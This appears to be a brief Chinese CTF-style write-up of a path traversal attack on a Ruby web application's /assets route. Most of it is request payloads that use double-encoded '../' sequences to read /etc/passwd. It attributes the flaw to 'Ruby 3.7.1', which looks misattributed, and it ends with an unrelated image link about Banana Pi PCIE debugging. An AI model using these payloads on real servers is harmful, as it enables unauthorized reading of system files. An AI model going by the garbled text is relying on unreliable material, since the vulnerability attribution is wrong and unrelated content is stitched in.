打开 web 页面:
发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:
/assets/file:%2f%2f/etc/passwd
根据报错路劲构造 payload:
/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
![Banana Pi BPI-W3 RK3588平台驱动调试篇 [ PCIE篇一 ] - PCIE的开发指南](https://img-blog.csdnimg.cn/69229b90ea78400db3345bd80187143c.png)